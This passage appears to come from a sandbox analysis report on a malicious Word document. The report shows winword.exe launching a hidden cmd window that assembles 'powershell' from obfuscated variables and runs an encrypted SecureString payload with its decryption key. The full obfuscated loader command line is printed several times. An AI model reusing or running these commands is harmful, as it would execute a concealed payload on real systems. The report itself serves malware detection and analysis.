NwBmAGEAYQBkADMAMQBkADUAZAAyAGEAMwBiADQAOQBiAGMAOQBkADkAYwA5ADQANwA2AGUAZQBhADIAOQBhADYANwBhAGMAYQAxADcAMABmADcAZgAyAGMAMQA3AGYAMwAxADkAZAA0AGEAYwAxADgAMgAxAGMAZQA5ADIAYwA3ADkANgBhADUAOAAwAGQANwBkADIAZQAzAGEANgBhADUANgAxADkAZgBkADQAOAA2ADEAMABlADYANwBhAGEANwBiADQAOQBhADEANwA5ADQANgA1AGUAZQBjAGQAYgBjADIAMABkAGEAZQBjAGIANgBmADkAMwA0ADQAZABjADEAZQA3ADMAOQBiAGUAMgBlADIANwA4ADkAZQA4ADQAMwAzADYAMQA5ADkAZQA5AGUAZQA5AGYAZQBkADMAOAA4AGMAMABhADYAYQBhAGEAYwAyADgAYgAwADQAMABkAGYANgA1AGUAMABkADkAMAA5AGUAYQBkAGMAOAAzADQAMwA2AGIANQA4AGIAMgBjADIAZgAyADMAMAA0ADMAMQBlAGQANQBlADQAZgAyADkAOQAzADEAZQBhADUANgBjAGEAYQAyAGEAYQAzAGEAMAA2AGEANwBkADIANQBjAGEAYgA0AGMAOABmAGIAYwA4ADQAMgBiADEAMgBkAGQANwA5ADAAYgA1ADMAMgBkAGQAYwAyAGQAMwA2ADMAMQBkAGUAMwBmADcAZABhADMANgA4AGMAZgA2ADMAMgBkADYAZgAzAGEAMgBjAGUANwA3ADIAMgBjADEAYQAwAGQAOQBjADEAMQA4ADYAOQBlADMANAA2AGYANwA4ADkANwBhADMAYgAzAGUAZABjADkAYwAwADUAMAA5ADgAMwAyADUAZgA0ADYANABhADYAYgAxAGEAYwAzADAAYwBmADQAZgBmADMAMABlADkANgA4ADkANABiAGUANABmADcAMwAwADAAMQBhADEAOAA5AGYAOQAwAGUAMAAxADkAMgA2ADEANAA3ADQANQAwADAANABlADYAYQBlADUANAA1ADQAZgA2AGYANwAxADYAMgA3AGEAOQA5ADEANgBhAGIAYQAzAGYAMwBiADIAMwA4ADkAYQBlAGMAMQA0ADEAYwA2AGQANgBiADkAMwA0ADkAZQA0ADEAMwA2ADcANAA2ADcAZAA3ADYAMgA4ADQAYQAyAGIANwAxAGQAMwA4ADMAMgA1AGUAZQBhADMAZAA0AGEAYgA4AGIAMwAxAGMAYwAwADMAMgBkADUAMQBlADUANwA2AGUAMwA0ADQANgBhADYAZABmADQANAA2ADUAYwBlADkANgBjAGIAOQBhADAAYwA3ADIAMQBhAGIAZAA2ADAANQA2AGQAZQAwAGIAYgAyADEANwAxAGMANQBkADUAMABiAGYAZgAyADgAMQBlADIAYwBkADEAYgA2AGMANABkAGEANwBjAGYAZABiADcAMQAzADUANgAyADEAMgAzADIANwA5ADIAOQA3AGUAYwBjADYAYwAwAGUAMwAwADQAMgBmADQANwA1ADMAYgA4AGIAOAAxADgAYQAyAGUANwAxADMAOQBkAGEANwAyAGIAMwA5ADkAMwA4ADcAOQA4AGMAMAA1AGIAOQAxADQAMQAxADQANQBkAGEAOQAzADcAMAA0AA==' | ConvERtTO-seCUresTRInG -kEy 235,141,10,115,253,223,40,208,200,207,56,80,97,178,217,1,219,168,233,93,195,61,84,222,48,18,135,157,195,85,87,106) ))))
cmdline powershell "& ((GET-vaRIable '*MDR*').NaME[3,11,2]-joIn'') ( ( [rUNTimE.iNtEROPSeRVIcES.mARshal]::PTrTosTrINgUni([RunTIMe.INTeRopservIces.MarshAL]::SecUrEsTRIngtogLobaLaLlocUNiCoDe($('76492d1116743f0423413b16050a5345MgB8AHoARABQAEkARgBZAEIAawBmAGcARgBLAFYAawB1AHIAcwBPAFMAWgBRAEEAPQA9AHwAZAAzADUAYwBhADEAMgAxAGYAYgA1AGQAZAA4ADkAOQAzADgAYgBhAGYAZQBlADUAOQBiAGYAZgA0AGQAMQAyAGEAMgA0ADMAMQAwADcAZAA2ADAAYwBlAGIAMwAxAGQAOAAxAGEAOQAxAGEAZgAxADYANAA2ADMAYQA5AGQAZAAzADkAZgAxADUAMAA2ADQANQA2ADYANQA4AGQAZAA4ADkAZQBlAGMANgBmADYAYQA1AGIAOAA0AGMAMABlAGMANQA0ADAAZQAxADkAOABjADUAZgA5AGQANgBmADEANgAxADgAOAA4AGMAYwBlAGMANQA4ADcAOQBiAGUAZgAzADkANQA3ADkAMABkAGMAMAA1ADgAZABhAGIAOAAwAGUAZAAxADMANAAzADgANwAzADcANAA3AGMAZQA2AGYAMQBiADAAOABiADIAMgAzADgAYQA3ADcANAA5AGUAMwBiADYANABjAGUAYwAwADkAZAA1ADEAMAA3AGIAZABhAGMAYwA4ADUAZAAyADkAZgA3ADQANQBmAGYAMQBmAGYAOQAzAGYAYgAxADAAMQAxADUAMQBmADUAMgA0AGYAMAA5ADUAYQAxAGYAZAA5ADMANABjADkAOQBhADEANgA2AGMANQA3ADcAZQA0ADcAMgAxADEANAAyADcAZgA1AGYAZgA2AGMAOQBjAGEAYQAyAGEAZQBjADgANgBkADYAMwAzAGEAZQBhADcAMgBlADgAYgAxADUAZQA5ADAAMgA2ADIANgBiADIAMwBiADQAYQA2AGMANABjADAAZQBjADgANQAwADQANgBmADEAOAAxADcAMAAxAGEAMgAwAGEAZgA2ADgAOQBkADAAMQA4ADYANABhADQANgBhAGYAMABmAGEAZAAxAGQAMgA2ADAAZABlADAANgBkAGQAOQBiADMAMwBkADkANABlADIAZAAzAGIAZABjADAAYwAyADYAYQBlADgAYwBjAGEAMAAwADQAYwBlAGUAMwAwAGEAYgAwAGUAMQA4AGIAMQBlADYAZAA4AGYANwAwADAAOAA1AGUAMQAyADUAZAAyADIAOAA4ADMAMgAxAGYAMwAyADgAYgA5ADAANABmADIAZQAxADgAZgA1AGUAYwA2AGUAOAA1ADgAYwAyADUAOQAwADQAZAAwADUAYQAyADUAYQBkAGIAZgA1AGEANQBjAGQANAA1ADgAZQBlAGIANwA3ADMAMQA5AGQAMQA1AGYAZAAxADIAYwBmAGIAMgA2ADAAZgAwAGYAYQAxADUANgA2ADQAOAA2ADQAMABmADAANgA5AGEAOAAxAGMAZAAzADcAYgBlAGYAYwA3AGYANQA1ADgAOQA5ADUAYQAxADcAYwA4AGMAYQA3AGEAMgBjAGIANQBmAGEAOABmADQAYwBmADAAZgA0ADMAMAA5ADIANQBiADUAZABlAGYAMgBkADgAZgA4AGUAMwBmADgAYgBhADEAYgAyADgAMAA3AGEAMwA1ADIAZgA1ADIAMAAwAGQANgA2ADgAYgBhAGYANAAwADMAYQBlADYANwA4ADgAYQA1ADMANQA2ADkAYwAxADUAZABkADQAMgA5ADkAMAA4ADgAOABiADUAOAAzAGIANAAyADcANwBkADcAYgAwADMAMABiAGYAYwAwADkAZgA3ADgAZQAwADEANQA5AGIAZQBjAGEAOQA2AGEAYwA0ADUAYQBlAGUANQAzAGQAYwA3ADkAOQAzADEANAA0AGYAMAA0ADYAYwAxAGMAMgA3ADMANwBmADMAYQA5ADYAMwA0ADkAMwA5AGEAMQA3ADMAYQBlAGYAZQAyADUAYwBkADIANwA4ADQAYgBmADYAZABmADMAOQBmADIAOQAzADQAYwA0AGMAYgBjAGMAOAA1ADEAYgA3ADQAYQAzAGIAYgAzADkAZQA0ADkAOQBiAGIAYQA0AGMAMgBmADAAYgBhAGMAOQA2ADQAZABiADEAMgA2ADkAOAAyADAAYQA1ADAAYQBmADIAMwBiADIAZQBiAGEAYwA3ADIANAA0AGIAZgA1ADgANgBmADUANgAxADQAMgA5ADcAYwBkADUAZgAyADAAYQA1AGYANQBiAGUAMQAwADgAOABmADcANwBiADEAMwBkAGUANgBkADgAMAA2AGIAYQA1ADUAZQAwADMAZQBmADkAZAAwAGQANwA4AGYANgA5ADkAYwBlADYAOAA0ADUANQA4ADcANwBhAGEAMQA5AGYAMQAxADAAOQBjADkAYwA5AGEAOQA2ADcAMwA0ADUAZgBlAGIAOABjADAANgBmADcAZQA1ADgAMABmADgAOQAxAGYAMgBhADcANwBmADcANgA1ADYAYwAzADIAZgA0AGMAOAA0AGMAYwA4ADYAZABjADMAZQAxAGUAMAAyADIAYgAwADQAZAA3ADAAYgBhADcANAA2ADEAMABjADYAYwA3ADAANAA2ADQAYwBhADMAMAA0AGEANwBmAGEAYQBkADMAMQBkADUAZAAyAGEAMwBiADQAOQBiAGMAOQBkADkAYwA5ADQANwA2AGUAZQBhADIAOQBhADYANwBhAGMAYQAxADcAMABmADcAZgAyAGMAMQA3AGYAMwAxADkAZAA0AGEAYwAxADgAMgAxAGMAZQA5ADIAYwA3ADkANgBhADUAOAAwAGQANwBkADIAZQAzAGEANgBhADUANgAxADkAZgBkADQAOAA2ADEAMABlADYANwBhAGEANwBiADQAOQBhADEANwA5ADQANgA1AGUAZQBjAGQAYgBjADIAMABkAGEAZQBjAGIANgBmADkAMwA0ADQAZABjADEAZQA3ADMAOQBiAGUAMgBlADIANwA4ADkAZQA4ADQAMwAzADYAMQA5ADkAZQA5AGUAZQA5AGYAZQBkADMAOAA4AGMAMABhADYAYQBhAGEAYwAyADgAYgAwADQAMABkAGYANgA1AGUAMABkADkAMAA5AGUAYQBkAGMAOAAzADQAMwA2AGIANQA4AGIAMgBjADIAZgAyADMAMAA0ADMAMQBlAGQANQBlADQAZgAyADkAOQAzADEAZQBhADUANgBjAGEAYQAyAGEAYQAzAGEAMAA2AGEANwBkADIANQBjAGEAYgA0AGMAOABmAGIAYwA4ADQAMgBiADEAMgBkAGQANwA5ADAAYgA1ADMAMgBkAGQAYwAyAGQAMwA2ADMAMQBkAGUAMwBmADcAZABhADMANgA4AGMAZgA2ADMAMgBkADYAZgAzAGEAMgBjAGUANwA3ADIAMgBjADEAYQAwAGQAOQBjADEAMQA4ADYAOQBlADMANAA2AGYANwA4ADkANwBhADMAYgAzAGUAZABjADkAYwAwADUAMAA5ADgAMwAyADUAZgA0ADYANABhADYAYgAxAGEAYwAzADAAYwBmADQAZgBmADMAMABlADkANgA4ADkANABiAGUANABmADcAMwAwADAAMQBhADEAOAA5AGYAOQAwAGUAMAAxADkAMgA2ADEANAA3ADQANQAwADAANABlADYAYQBlADUANAA1ADQAZgA2AGYANwAxADYAMgA3AGEAOQA5ADEANgBhAGIAYQAzAGYAMwBiADIAMwA4ADkAYQBlAGMAMQA0ADEAYwA2AGQANgBiADkAMwA0ADkAZQA0ADEAMwA2ADcANAA2ADcAZAA3ADYAMgA4ADQAYQAyAGIANwAxAGQAMwA4ADMAMgA1AGUAZQBhADMAZAA0AGEAYgA4AGIAMwAxAGMAYwAwADMAMgBkADUAMQBlADUANwA2AGUAMwA0ADQANgBhADYAZABmADQANAA2ADUAYwBlADkANgBjAGIAOQBhADAAYwA3ADIAMQBhAGIAZAA2ADAANQA2AGQAZQAwAGIAYgAyADEANwAxAGMANQBkADUAMABiAGYAZgAyADgAMQBlADIAYwBkADEAYgA2AGMANABkAGEANwBjAGYAZABiADcAMQAzADUANgAyADEAMgAzADIANwA5ADIAOQA3AGUAYwBjADYAYwAwAGUAMwAwADQAMgBmADQANwA1ADMAYgA4AGIAOAAxADgAYQAyAGUANwAxADMAOQBkAGEANwAyAGIAMwA5ADkAMwA4ADcAOQA4AGMAMAA1AGIAOQAxADQAMQAxADQANQBkAGEAOQAzADcAMAA0AA==' | ConvERtTO-seCUresTRInG -kEy 235,141,10,115,253,223,40,208,200,207,56,80,97,178,217,1,219,168,233,93,195,61,84,222,48,18,135,157,195,85,87,106) ))))
A process created a hidden window (1 event)
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: apRbHrO EDHKZhizWwzfbiXhDYoTSzLT IIqwNqsjaWqf & %C^om^S^pEc% %C^om^S^pEc% /V /c set %qSKqZwGasVPLAjE%=mYSBOWwfLFAOv&&set %ZFJjsqCNFzjUTZ%=p&&set %CQFswJPFuKz%=ow&&set %mNsVdcoFqUDskdE%=VSvEcjcq&&set %iZIRGWMKmMNiTh%=!%ZFJjsqCNFzjUTZ%!&&set %vETUfiTwsfFHWqW%=PmvDOId&&set %wUuTGGAzLdENi%=er&&set %IMHbLklGnQWW%=!%CQFswJPFuKz%!&&set %BYmEZDNYMcNku%=s&&set %stXpmEJSClCZYIU%=LAFAFYwkfwr&&set %KzPWuzEtLfcOS%=he&&set %RYMrNHHqSqk%=ll&&!%iZIRGWMKmMNiTh%!!%IMHbLklGnQWW%!!%wUuTGGAzLdENi%!!%BYmEZDNYMcNku%!!%KzPWuzEtLfcOS%!!%RYMrNHHqSqk%! "& ((GET-vaRIable '*MDR*').NaME[3,11,2]-joIn'') ( ( [rUNTimE.iNtEROPSeRVIcES.mARshal]::PTrTosTrINgUni([RunTIMe.INTeRopservIces.MarshAL]::SecUrEsTRIngtogLobaLaLlocUNiCoDe($('76492d1116743f0423413b16050a5345MgB8AHoARABQAEkARgBZAEIAawBmAGcARgBLAFYAawB1AHIAcwBPAFMAWgBRAEEAPQA9AHwAZAAzADUAYwBhADEAMgAxAGYAYgA1AGQAZAA4ADkAOQAzADgAYgBhAGYAZQBlADUAOQBiAGYAZgA0AGQAMQAyAGEAMgA0ADMAMQAwADcAZAA2ADAAYwBlAGIAMwAxAGQAOAAxAGEAOQAxAGEAZgAxADYANAA2ADMAYQA5AGQAZAAzADkAZgAxADUAMAA2ADQANQA2ADYANQA4AGQAZAA4ADkAZQBlAGMANgBmADYAYQA1AGIAOAA0AGMAMABlAGMANQA0ADAAZQAxADkAOABjADUAZgA5AGQANgBmADEANgAxADgAOAA4AGMAYwBlAGMANQA4ADcAOQBiAGUAZgAzADkANQA3ADkAMABkAGMAMAA1ADgAZABhAGIAOAAwAGUAZAAxADMANAAzADgANwAzADcANAA3AGMAZQA2AGYAMQBiADAAOABiADIAMgAzADgAYQA3ADcANAA5AGUAMwBiADYANABjAGUAYwAwADkAZAA1ADEAMAA3AGIAZABhAGMAYwA4ADUAZAAyADkAZgA3ADQANQBmAGYAMQBmAGYAOQAzAGYAYgAxADAAMQAxADUAMQBmADUAMgA0AGYAMAA5ADUAYQAxAGYAZAA5ADMANABjADkAOQBhADEANgA2AGMANQA3ADcAZQA0ADcAMgAxADEANAAyADcAZgA1AGYAZgA2AGMAOQBjAGEAYQAyAGEAZQBjADgANgBkADYAMwAzAGEAZQBhADcAMgBlADgAYgAxADUAZQA5ADAAMgA2ADIANgBiADIAMwBiADQAYQA2AGMANABjADAAZQBjADgANQAwADQANgBmADEAOAAxADcAMAAxAGEAMgAwAGEAZgA2ADgAOQBkADAAMQA4ADYANABhADQANgBhAGYAMABmAGEAZAAxAGQAMgA2ADAAZABlADAANgBkAGQAOQBiADMAMwBkADkANABlADIAZAAzAGIAZABjADAAYwAyADYAYQBlADgAYwBjAGEAMAAwADQAYwBlAGUAMwAwAGEAYgAwAGUAMQA4AGIAMQBlADYAZAA4AGYANwAwADAAOAA1AGUAMQAyADUAZAAyADIAOAA4ADMAMgAxAGYAMwAyADgAYgA5ADAANABmADIAZQAxADgAZgA1AGUAYwA2AGUAOAA1ADgAYwAyADUAOQAwADQAZAAwADUAYQAyADUAYQBkAGIAZgA1AGEANQBjAGQANAA1ADgAZQBlAGIANwA3ADMAMQA5AGQAMQA1AGYAZAAxADIAYwBmAGIAMgA2ADAAZgAwAGYAYQAxADUANgA2ADQAOAA2ADQAMABmADAANgA5AGEAOAAxAGMAZAAzADcAYgBlAGYAYwA3AGYANQA1ADgAOQA5ADUAYQAxADcAYwA4AGMAYQA3AGEAMgBjAGIANQBmAGEAOABmADQAYwBmADAAZgA0ADMAMAA5ADIANQBiADUAZABlAGYAMgBkADgAZgA4AGUAMwBmADgAYgBhADEAYgAyADgAMAA3AGEAMwA1ADIAZgA1ADIAMAAwAGQANgA2ADgAYgBhAGYANAAwADMAYQBlADYANwA4ADgAYQA1ADMANQA2ADkAYwAxADUAZABkADQAMgA5ADkAMAA4ADgAOABiADUAOAAzAGIANAAyADcANwBkADcAYgAwADMAMABiAGYAYwAwADkAZgA3ADgAZQAwADEANQA5AGIAZQBjAGEAOQA2AGEAYwA0ADUAYQBlAGUANQAzAGQAYwA3ADkAOQAzADEANAA0AGYAMAA0ADYAYwAxAGMAMgA3ADMANwBmADMAYQA5ADYAMwA0ADkAMwA5AGEAMQA3ADMAYQBlAGYAZQAyADUAYwBkADIANwA4ADQAYgBmADYAZABmADMAOQBmADIAOQAzADQAYwA0AGMAYgBjAGMAOAA1ADEAYgA3ADQAYQAzAGIAYgAzADkAZQA0ADkAOQBiAGIAYQA0AGMAMgBmADAAYgBhAGMAOQA2ADQAZABiADEAMgA2ADkAOAAyADAAYQA1ADAAYQBmADIAMwBiADIAZQBiAGEAYwA3ADIANAA0AGIAZgA1ADgANgBmADUANgAxADQAMgA5ADcAYwBkADUAZgAyADAAYQA1AGYANQBiAGUAMQAwADgAOABmADcANwBiADEAMwBkAGUANgBkADgAMAA2AGIAYQA1ADUAZQAwADMAZQBmADkAZAAwAGQANwA4AGYANgA5ADkAYwBlADYAOAA0ADUANQA4ADcANwBhAGEAMQA5AGYAMQAxADAAOQBjADkAYwA5AGEAOQA2ADcAMwA0ADUAZgBlAGIAOABjADAANgBmADcAZQA1ADgAMABmADgAOQAxAGYAMgBhADcANwBmADcANgA1ADYAYwAzADIAZgA0AGMAOAA0AGMAYwA4ADYAZABjADMAZQAxAGUAMAAyADIAYgAwADQAZAA3ADAAYgBhADcANAA2ADEAMABjADYAYwA3ADAANAA2ADQAYwBhADMAMAA0AGEANwBmAGEAYQBkADMAMQBkADUAZAAyAGEAMwBiADQAOQBiAGMAOQBkADkAYwA5ADQANwA2AGUAZQBhADIAOQBhADYANwBhAGMAYQAxADcAMABmADcAZgAyAGMAMQA3AGYAMwAxADkAZAA0AGEAYwAxADgAMgAxAGMAZQA5ADIAYwA3ADkANgBhADUAOAAwAGQANwBkADIAZQAzAGEANgBhADUANgAxADkAZgBkADQAOAA2ADEAMABlADYANwBhAGEANwBiADQAOQBhADEANwA5ADQANgA1AGUAZQBjAGQAYgBjADIAMABkAGEAZQBjAGIANgBmADkAMwA0ADQAZABjADEAZQA3ADMAOQBiAGUAMgBlADIANwA4ADkAZQA4ADQAMwAzADYAMQA5ADkAZQA5AGUAZQA5AGYAZQBkADMAOAA4AGMAMABhADYAYQBhAGEAYwAyADgAYgAwADQAMABkAGYANgA1AGUAMABkADkAMAA5AGUAYQBkAGMAOAAzADQAMwA2AGIANQA4AGIAMgBjADIAZgAyADMAMAA0ADMAMQBlAGQANQBlADQAZgAyADkAOQAzADEAZQBhADUANgBjAGEAYQAyAGEAYQAzAGEAMAA2AGEANwBkADIANQBjAGEAYgA0AGMAOABmAGIAYwA4ADQAMgBiADEAMgBkAGQANwA5ADAAYgA1ADMAMgBkAGQAYwAyAGQAMwA2ADMAMQBkAGUAMwBmADcAZABhADMANgA4AGMAZgA2ADMAMgBkADYAZgAzAGEAMgBjAGUANwA3ADIAMgBjADEAYQAwAGQAOQBjADEAMQA4ADYAOQBlADMANAA2AGYANwA4ADkANwBhADMAYgAzAGUAZABjADkAYwAwADUAMAA5ADgAMwAyADUAZgA0ADYANABhADYAYgAxAGEAYwAzADAAYwBmADQAZgBmADMAMABlADkANgA4ADkANABiAGUANABmADcAMwAwADAAMQBhADEAOAA5AGYAOQAwAGUAMAAxADkAMgA2ADEANAA3ADQANQAwADAANABlADYAYQBlADUANAA1ADQAZgA2AGYANwAxADYAMgA3AGEAOQA5ADEANgBhAGIAYQAzAGYAMwBiADIAMwA4ADkAYQBlAGMAMQA0ADEAYwA2AGQANgBiADkAMwA0ADkAZQA0ADEAMwA2ADcANAA2ADcAZAA3ADYAMgA4ADQAYQAyAGIANwAxAGQAMwA4ADMAMgA1AGUAZQBhADMAZAA0AGEAYgA4AGIAMwAxAGMAYwAwADMAMgBkADUAMQBlADUANwA2AGUAMwA0ADQANgBhADYAZABmADQANAA2ADUAYwBlADkANgBjAGIAOQBhADAAYwA3ADIAMQBhAGIAZAA2ADAANQA2AGQAZQAwAGIAYgAyADEANwAxAGMANQBkADUAMABiAGYAZgAyADgAMQBlADIAYwBkADEAYgA2AGMANABkAGEANwBjAGYAZABiADcAMQAzADUANgAyADEAMgAzADIANwA5ADIAOQA3AGUAYwBjADYAYwAwAGUAMwAwADQAMgBmADQANwA1ADMAYgA4AGIAOAAxADgAYQAyAGUANwAxADMAOQBkAGEANwAyAGIAMwA5ADkAMwA4ADcAOQA4AGMAMAA1AGIAOQAxADQAMQAxADQANQBkAGEAOQAzADcAMAA0AA==' | ConvERtTO-seCUresTRInG -kEy 235,141,10,115,253,223,40,208,200,207,56,80,97,178,217,1,219,168,233,93,195,61,84,222,48,18,135,157,195,85,87,106) ))))
filepath: cmd
1 1 0
A command shell or script process was created by an unexpected parent process (1 event)
parent_process winword.exe martian_process cmd apRbHrO EDHKZhizWwzfbiXhDYoTSzLT IIqwNqsjaWqf & %C^om^S^pEc% %C^om^S^pEc% /V /c set %qSKqZwGasVPLAjE%=mYSBOWwfLFAOv&&set %ZFJjsqCNFzjUTZ%=p&&set %CQFswJPFuKz%=ow&&set %mNsVdcoFqUDskdE%=VSvEcjcq&&set %iZIRGWMKmMNiTh%=!%ZFJjsqCNFzjUTZ%!&&set %vETUfiTwsfFHWqW%=PmvDOId&&set %wUuTGGAzLdENi%=er&&set %IMHbLklGnQWW%=!%CQFswJPFuKz%!&&set %BYmEZDNYMcNku%=s&&set %stXpmEJSClCZYIU%=LAFAFYwkfwr&&set %KzPWuzEtLfcOS%=he&&set %RYMrNHHqSqk%=ll&&!%iZIRGWMKmMNiTh%!!%IMHbLklGnQWW%!!%wUuTGGAzLdENi%!!%BYmEZDNYMcNku%!!%KzPWuzEtLfcOS%!!%RYMrNHHqSqk%! "& ((GET-vaRIable '*MDR*').NaME[3,11,2]-joIn'') ( ( [rUNTimE.iNtEROPSeRVIcES.mARshal]::PTrTosTrINgUni([RunTIMe.INTeRopservIces.MarshAL]::SecUrEsTRIngtogLobaLaLlocUNiCoDe($('76492d1116743f0423413b16050a5345MgB8AHoARABQAEkARgBZAEIAawBmAGcARgBLAFYAawB1AHIAcwBPAFMAWgBRAEEAPQA9AHwAZAAzADUAYwBhADEAMgAxAGYAYgA1AGQAZAA4ADkAOQAzADgAYgBhAGYAZQBlADUAOQBiAGYAZgA0AGQAMQAyAGEAMgA0ADMAMQAwADcAZAA2ADAAYwBlAGIAMwAxAGQAOAAxAGEAOQAxAGEAZgAxADYANAA2ADMAYQA5AGQAZAAzADkAZgAxADUAMAA2ADQANQA2ADYANQA4AGQAZAA4ADkAZQBlAGMANgBmADYAYQA1AGIAOAA0AGMAMABlAGMANQA0ADAAZQAxADkAOABjADUAZgA5AGQANgBmADEANgAxADgAOAA4AGMAYwBlAGMANQA4ADcAOQBiAGUAZgAzADkANQA3ADkAMABkAGMAMAA1ADgAZABhAGIAOAAwAGUAZAAxADMANAAzADgANwAzADcANAA3AGMAZQA2AGYAMQBiADAAOABiADIAMgAzADgAYQA3ADcANAA5AGUAMwBiADYANABjAGUAYwAwADkAZAA1ADEAMAA3AGIAZABhAGMAYwA4ADUAZAAyADkAZgA3ADQANQBmAGYAMQBmAGYAOQAzAGYAYgAxADAAMQAxADUAMQBmADUAMgA0AGYAMAA5ADUAYQAxAGYAZAA5ADMANABjADkAOQBhADEANgA2AGMANQA3ADcAZQA0ADcAMgAxADEANAAyADcAZgA1AGYAZgA2AGMAOQBjAGEAYQAyAGEAZQBjADgANgBkADYAMwAzAGEAZQBhADcAMgBlADgAYgAxADUAZQA5ADAAMgA2ADIANgBiADIAMwBiADQAYQA2AGMANABjADAAZQBjADgANQAwADQANgBmADEAOAAxADcAMAAxAGEAMgAwAGEAZgA2ADgAOQBkADAAMQA4ADYANABhADQANgBhAGYAMABmAGEAZAAxAGQAMgA2ADAAZABlADAANgBkAGQAOQBiADMAMwBkADkANABlADIAZAAzAGIAZABjADAAYwAyADYAYQBlADgAYwBjAGEAMAAwADQAYwBlAGUAMwAwAGEAYgAwAGUAMQA4AGIAMQBlADYAZAA4AGYANwAwADAAOAA1AGUAMQAyADUAZAAyADIAOAA4ADMAMgAxAGYAMwAyADgAYgA5ADAANABmADIAZQAxADgAZgA1AGUAYwA2AGUAOAA1ADgAYwAyADUAOQAwADQAZAAwADUAYQAyADUAYQBkAGIAZgA1AGEANQBjAGQANAA1ADgAZQBlAGIANwA3ADMAMQA5AGQAMQA1AGYAZAAxADIAYwBmAGIAMgA2ADAAZgAwAGYAYQAxADUANgA2ADQAOAA2ADQAMABmADAANgA5AGEAOAAxAGMAZAAzADcAYgBlAGYAYwA3AGYANQA1ADgAOQA5ADUAYQAxADcAYwA4AGMAYQA3AGEAMgBjAGIANQBmAGEAOABmADQAYwBmADAAZgA0ADMAMAA5ADIANQBiADUAZABlAGYAMgBkADgAZgA4AGUAMwBmADgAYgBhADEAYgAyADgAMAA3AGEAMwA1ADIAZgA1ADIAMAAwAGQANgA2ADgAYgBhAGYANAAwADMAYQBlADYANwA4ADgAYQA1ADMANQA2ADkAYwAxADUAZABkADQAMgA5ADkAMAA4ADgAOABiADUAOAAzAGIANAAyADcANwBkADcAYgAwADMAMABiAGYAYwAwADkAZgA3ADgAZQAwADEANQA5AGIAZQBjAGEAOQA2AGEAYwA0ADUAYQBlAGUANQAzAGQAYwA3ADkAOQAzADEANAA0AGYAMAA0ADYAYwAxAGMAMgA3ADMANwBmADMAYQA5ADYAMwA0ADkAMwA5AGEAMQA3ADMAYQBlAGYAZQAyADUAYwBkADIANwA4ADQAYgBmADYAZABmADMAOQBmADIAOQAzADQAYwA0AGMAYgBjAGMAOAA1ADEAYgA3ADQAYQAzAGIAYgAzADkAZQA0ADkAOQBiAGIAYQA0AGMAMgBmADAAYgBhAGMAOQA2ADQAZABiADEAMgA2ADkAOAAyADAAYQA1ADAAYQBmADIAMwBiADIAZQBiAGEAYwA3ADIANAA0AGIAZgA1ADgANgBmADUANgAxADQAMgA5ADcAYwBkADUAZgAyADAAYQA1AGYANQBiAGUAMQAwADgAOABmADcANwBiADEAMwBkAGUANgBkADgAMAA2AGIAYQA1ADUAZQAwADMAZQBmADkAZAAwAGQANwA4AGYANgA5ADkAYwBlADYAOAA0ADUANQA4ADcANwBhAGEAMQA5AGYAMQAxADAAOQBjADkAYwA5AGEAOQA2ADcAMwA0ADUAZgBlAGIAOABjADAANgBmADcAZQA1ADgAMABmADgAOQAxAGYAMgBhADcANwBmADcANgA1ADYAYwAzADIAZgA0AGMAOAA0AGMAYwA4ADYAZABjADMAZQAxAGUAMAAyADIAYgAwADQAZAA3ADAAYgBhADcANAA2ADEAMABjADYAYwA3ADAANAA2ADQAYwBhADMAMAA0AGEANwBmAGEAYQBkADMAMQBkADUAZAAyAGEAMwBiADQAOQBiAGMAOQBkADkAYwA5ADQANwA2AGUAZQBhADIAOQBhADYANwBhAGMAYQAxADcAMABmADcAZgAyAGMAMQA3AGYAMwAxADkAZAA0AGEAYwAxADgAMgAxAGMAZQA5ADIAYwA3ADkANgBhADUAOAAwAGQANwBkADIAZQAzAGEANgBhADUANgAxADkAZgBkADQAOAA2ADEAMABlADYANwBhAGEANwBiADQAOQBhADEANwA5ADQANgA1AGUAZQBjAGQAYgBjADIAMABkAGEAZQBjAGIANgBmADkAMwA0ADQAZABjADEAZQA3ADMAOQBiAGUAMgBlADIANwA4ADkAZQA4ADQAMwAzADYAMQA5ADkAZQA5AGUAZQA5AGYAZQBkADMAOAA4AGMAMABhADYAYQBhAGEAYwAyADgAYgAwADQAMABkAGYANgA1AGUAMABkADkAMAA5AGUAYQBkAGMAOAAzADQAMwA2AGIANQA4AGIAMgBjADIAZgAyADMAMAA0ADMAMQBlAGQANQBlADQAZgAyADkAOQAzADEAZQBhADUANgBjAGEAYQAyAGEAYQAzAGEAMAA2AGEANwBkADIANQBjAGEAYgA0AGMAOABmAGIAYwA4ADQAMgBiADEAMgBkAGQANwA5ADAAYgA1ADMAMgBkAGQAYwAyAGQAMwA2ADMAMQBkAGUAMwBmADcAZABhADMANgA4AGMAZgA2ADMAMgBkADYAZgAzAGEAMgBjAGUANwA3ADIAMgBjADEAYQAwAGQAOQBjADEAMQA4ADYAOQBlADMANAA2AGYANwA4ADkANwBhADMAYgAzAGUAZABjADkAYwAwADUAMAA5ADgAMwAyADUAZgA0ADYANABhADYAYgAxAGEAYwAzADAAYwBmADQAZgBmADMAMABlADkANgA4ADkANABiAGUANABmADcAMwAwADAAMQBhADEAOAA5AGYAOQAwAGUAMAAxADkAMgA2ADEANAA3ADQANQAwADAANABlADYAYQBlADUANAA1ADQAZgA2AGYANwAxADYAMgA3AGEAOQA5ADEANgBhAGIAYQAzAGYAMwBiADIAMwA4ADkAYQBlAGMAMQA0ADEAYwA2AGQANgBiADkAMwA0ADkAZQA0ADEAMwA2ADcANAA2ADcAZAA3ADYAMgA4ADQAYQAyAGIANwAxAGQAMwA4ADMAMgA1AGUAZQBhADMAZAA0AGEAYgA4AGIAMwAxAGMAYwAwADMAMgBkADUAMQBlADUANwA2AGUAMwA0ADQANgBhADYAZABmADQANAA2ADUAYwBlADkANgBjAGIAOQBhADAAYwA3ADIAMQBhAGIAZAA2ADAANQA2AGQAZQAwAGIAYgAyADEANwAxAGMANQBkADUAMABiAGYAZgAyADgAMQBlADIAYwBkADEAYgA2AGMANABkAGEANwBjAGYAZABiADcAMQAzADUANgAyADEAMgAzADIANwA5ADIAOQA3AGUAYwBjADYAYwAwAGUAMwAwADQAMgBmADQANwA1ADMAYgA4AGIAOAAxADgAYQAyAGUANwAxADMAOQBkAGEANwAyAGIAMwA5ADkAMwA4ADcAOQA4AGMAMAA1AGIAOQAxADQAMQAxADQANQBkAGEAOQAzADcAMAA0AA==' | ConvERtTO-seCUresTRInG -kEy 